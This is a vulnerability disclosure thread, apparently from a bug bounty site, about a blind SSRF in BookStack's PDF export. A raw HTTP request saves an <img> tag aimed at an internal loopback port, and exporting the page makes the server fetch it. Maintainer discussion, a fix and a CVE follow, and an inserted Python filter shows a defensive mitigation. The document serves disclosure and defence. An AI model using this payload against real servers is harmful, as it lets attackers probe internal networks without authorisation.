Server-Side Request Forgery (SSRF) in bookstackapp/bookstack

Valid

Reported on

Aug 13th 2021


✍️ Description

A user with "Editor" rights can create a book page containing an <img> tag whose "src" attribute points to any external or internal resource. Exporting this page with the default dompdf renderer causes the server itself to issue the request.

🕵️‍♂️ Proof of Concept

Update the page with the malicious payload in the html parameter:

POST /books/<BOOK>/page/<PAGE> HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Cookie: <COOKIE>

_token=<CSRF-TOKEN>&_method=PUT&summary=&name=123&html=<img src="http://127.0.0.1:7654/test.jpg">&tags%5B0%5D%5Bname%5D=&tags%5B0%5D%5Bvalue%5D=&tags%5Brandrowid%5D%5Bname%5D=&tags%5Brandrowid%5D%5Bvalue%5D=&attachment_link_uploaded_to=1&attachment_link_name=&attachment_link_url=&template=false

Export the page to PDF:

http://<HOST>/books/<BOOK>/page/<PAGE>/export/pdf

💥 Impact

An attacker can use this vulnerability to exploit other resources inside the internal network perimeter.

Z-Old
a year ago

Admin


Hey @d3addog, I've just contacted the repo's maintainers for you. Good job!

We have contacted a member of the bookstackapp/bookstack team and are waiting to hear back a year ago
bookstackapp/bookstack maintainer
a year ago

Thanks for reporting @d3adog, and thanks for contacting @zidingz,

I have had this mentioned previously by a security researcher, but they considered it to be a relatively minor issue since the SSRF will be blind & image/CSS based only. Am I correct that this is still the case here? Or are there more significant potential effects?

This component making image requests is expected and I'd imagine is likely utilised for the functionality in use here. Maybe we could provide some security advice around this and the option to disable external fetching?

d3addog
a year ago

Researcher


Good day, sorry for the late answer. Yes, indeed it is blind SSRF, but due to the lack of PDF generator filtering it is possible to query any URL on any port with URL parameters regardless of whether it is an image or not. It is required for an external attacker to have a significant amount of luck to find a vulnerable service inside the infrastructure or to have additional information about the internal target. Due to the high exploitation difficulty I consider this vulnerability to be of medium severity. Regarding the mitigation, consider stripping out the src option from tags or limiting it only to external resources (as I saw during my fast recon with my installation of BookStack, there is no option to upload an image using a link, so this kind of fix will probably not affect user experience. Correct me if I'm wrong).
Thank you, d3addog

bookstackapp/bookstack maintainer
a year ago

Thanks @d3addog for following up.

I can confirm this issue. I'll mark this as valid, but I'm not sure how this platform works; I don't want to accidentally make this public until I have a patch together. It's not clear if this will be public after marking as valid or what the overall process is here.

I've got a plan to patch this in for the next release, which hopefully should be in the next couple of days. I'll be disabling any external server-side fetching by default within the export system.
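The two mitigations discussed in this thread (drop remote image sources by default, or only let explicitly allowed hosts through) can be applied as a filter over the page HTML before it reaches the PDF renderer. The following is an added example written for this page, not code from the report or from BookStack; the function and class names, the allowlist parameter and the sample page HTML are my own constructions. It assumes the export path has the page HTML as a string and can hand the filtered result to the renderer.

```python
import ipaddress
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: page HTML as an Editor could save it, including the
# loopback-pointing <img> from the report, a local upload and a remote CDN image.
SAMPLE_PAGE_HTML = (
    '<h1>Notes</h1>'
    '<img src="http://127.0.0.1:7654/test.jpg" alt="probe">'
    '<img src="/uploads/images/gallery/2021-08/diagram.png">'
    '<img src="https://cdn.example.com/logo.png">'
    '<p>Tom &amp; Jerry</p>'
)


def classify_src(src: str, allowed_hosts=()) -> str:
    """Classify an <img src> before the export renderer sees it.

    'local'   : relative path or data: URL, no outbound request is made
    'allowed' : absolute http(s) URL whose host is explicitly allowlisted
    'blocked' : everything else: file:/gopher:/protocol-relative URLs, IP
                literals that are not globally routable (loopback, RFC 1918,
                link-local such as cloud metadata endpoints), bare hostnames
                and localhost, and any host not on the allowlist
    Note: an allowlisted hostname can still resolve to an internal address
    (DNS rebinding), so this is a policy layer, not a substitute for network
    egress controls on the renderer host.
    """
    parts = urlsplit(src.strip())
    if parts.scheme == "data" or (not parts.scheme and not parts.netloc):
        return "local"
    if parts.scheme not in ("http", "https"):
        return "blocked"
    host = (parts.hostname or "").lower()
    try:
        if not ipaddress.ip_address(host).is_global:
            return "blocked"
    except ValueError:
        # Not an IP literal: reject names that can only mean "this box".
        if host == "localhost" or host.endswith(".localhost") or "." not in host:
            return "blocked"
    return "allowed" if host in allowed_hosts else "blocked"


class ExportImageFilter(HTMLParser):
    """Rewrite page HTML so the PDF renderer only fetches what policy allows.

    allow_remote=False (the safe default the maintainer describes) drops every
    absolute URL; allow_remote=True keeps only allowlisted hosts. A dropped
    image is replaced by its alt text so the export still reads sensibly.
    """

    def __init__(self, allow_remote=False, allowed_hosts=()):
        super().__init__(convert_charrefs=False)   # pass entities through untouched
        self.allow_remote = allow_remote
        self.allowed_hosts = tuple(h.lower() for h in allowed_hosts)
        self.out = []
        self.dropped = []

    def _emit_img(self, attrs):
        attrs = dict(attrs)
        src = attrs.get("src") or ""
        verdict = classify_src(src, self.allowed_hosts)
        if verdict == "local" or (verdict == "allowed" and self.allow_remote):
            self.out.append(self.get_starttag_text())   # original tag, verbatim
            return
        self.dropped.append(src)
        alt = attrs.get("alt") or "[image removed]"
        self.out.append(f'<span class="blocked-image">{escape(alt)}</span>')

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self._emit_img(attrs)
        else:
            self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)        # get_starttag_text() includes "/>"

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def sanitise_for_export(html: str, allow_remote=False, allowed_hosts=()):
    """Return (safe_html, dropped_srcs) ready to hand to the PDF renderer."""
    f = ExportImageFilter(allow_remote, allowed_hosts)
    f.feed(html)
    f.close()
    return "".join(f.out), f.dropped


if __name__ == "__main__":
    safe, dropped = sanitise_for_export(SAMPLE_PAGE_HTML)
    print("dropped:", dropped)   # both absolute URLs are removed by default
    print(safe)
```

The filter deliberately runs on the export path rather than on page save, so existing content is covered without a migration and the normal page view, which is rendered by the reader's browser and not by the server, is unchanged. dompdf also has its own renderer-level switch for remote fetching (its isRemoteEnabled option); keeping that off is the second layer, since the HTML filter only governs what the application chooses to pass in.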

bookstackapp/bookstack maintainer validated this vulnerability a year ago
d3addog has been awarded the disclosure bounty
The fix bounty is now up for grabs
bookstackapp/bookstack maintainer confirmed that a fix has been merged on bee5e2 a year ago
The fix bounty has been dropped
Jamie Slome
a year ago

Admin


CVE published! 🎉
